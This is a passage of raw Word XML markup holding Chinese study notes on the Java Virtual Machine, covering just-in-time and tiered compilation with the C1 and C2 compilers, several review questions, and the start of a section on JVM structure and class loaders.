          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>即时编译占用程序运行时间，要编译出优化程度更高的代码</w:t>
      </w:r>
      <w:r w:rsidR="007046F1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所花费时间更</w:t>
      </w:r>
      <w:r w:rsidR="008A6BE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>长，而且想要编译出优化程度更高的代码，解释器可能还要替编译器收集</w:t>
      </w:r>
      <w:r w:rsidR="007046F1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>性能监控信息，这对解释执行的速度有影响。为在程序启动响应效率与运行效率之间达到平衡，HotSpot启用</w:t>
      </w:r>
      <w:r w:rsidR="00EC4BF5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分层编译，Jdk16一直处于改进状态，</w:t>
      </w:r>
      <w:r w:rsidR="00EB46D6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JDk</w:t>
      </w:r>
      <w:r w:rsidR="00EC4BF5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>17的server模式虚拟机作为默认编译策略被开启。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4BF5" w:rsidRDefault="00EC4BF5" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>分层编译器根据编译器编译、优化的规模与耗时，划分</w:t>
      </w:r>
      <w:r w:rsidR="0008471B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>出不同的编译层次。其中包括：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0008471B" w:rsidRPr="001A6D09" w:rsidRDefault="0008471B" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Client Compiler和Server Compiler会实现</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分层编译</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（JDK 1.7默认有）。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第0层  程序解析执行，解析器不开启性能监控，可触发第一层编译。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">第1层  </w:t>
      </w:r>
      <w:r w:rsidR="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也称为C1编译，将字节码</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编译成本地相关代码，进行简单优化</w:t>
      </w:r>
      <w:r w:rsidR="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如果有必要可加入</w:t>
      </w:r>
      <w:r w:rsidR="001A6D09" w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>性能监控</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">第2层  </w:t>
      </w:r>
      <w:r w:rsidR="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也称为C2编译，</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>除</w:t>
      </w:r>
      <w:r w:rsidR="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将字节码</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编译成本地相关代码外，还进行成编译耗时较长的优化。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实施分层编译之后，</w:t>
      </w:r>
      <w:r w:rsidR="001A6D09" w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Client Compiler</w:t>
      </w:r>
      <w:r w:rsidR="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="001A6D09" w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Server Compiler</w:t>
      </w:r>
      <w:r w:rsidR="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将会同时工作，许多代码可能会多次编译，</w:t>
      </w:r>
      <w:r w:rsidR="001A6D09" w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Client Compiler获得更高的编译速度</w:t>
      </w:r>
      <w:r w:rsidR="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="001A6D09" w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server Compiler获得更好的编译质量，无须承担性能监控的任务</w:t>
      </w:r>
      <w:r w:rsidR="001A6D09" w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6D09" w:rsidRPr="00EC4BF5" w:rsidRDefault="001A6D09" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009666C2" w:rsidRDefault="00110C1F" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为何JVM需要使用解释器和编译器并存的架构？</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM为什么要实现两个不同的即时编译器？</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序何时会使用解释器执行？何时会使用编译器执行？</w:t>
      </w:r>
      <w:r w:rsidR="00DE2555" w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(client compiler和server compiler</w:t>
      </w:r>
      <w:r w:rsidR="001F5E86" w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，解释器和编译器搭配使用的方式在虚拟机中称为混合模式</w:t>
      </w:r>
      <w:r w:rsidR="00DE2555" w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>哪些程序代码会被编译成为本地代码？如何编译？</w:t>
      </w:r>
      <w:r w:rsidR="000F556C" w:rsidRPr="00514C45">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即时编译的代码有两大类，被多次调用的方法和被多次执行的循环体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00110C1F" w:rsidRPr="001A6D09" w:rsidRDefault="00110C1F" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JAVA代码的执行</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>效率就一定比C,C++静态执行的执行差？JAVA代码解析执行有何优势？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E97483" w:rsidRPr="00F41A4C" w:rsidRDefault="00582C16" w:rsidP="00E97483">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E97483" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  JVM</w:t>
      </w:r>
      <w:r w:rsidR="00E97483">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009376E7" w:rsidRPr="009376E7" w:rsidRDefault="009376E7" w:rsidP="009376E7">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4672555" cy="4723075"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="75" name="图片 9" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\407345725\QQ\WinTemp\RichOle\7S0ZSGCY@`3`ON2Z~EWVOV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istrator\AppData\Roaming\Tencent\Users\407345725\QQ\WinTemp\RichOle\7S0ZSGCY@`3`ON2Z~EWVOV4.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4675328" cy="4725878"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009376E7" w:rsidRDefault="009376E7" w:rsidP="009376E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>从左图可知，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>主要包括四个部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009376E7" w:rsidRDefault="009376E7" w:rsidP="009376E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>类加载器（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>启动时或者在类运行时将需要的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>加载到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
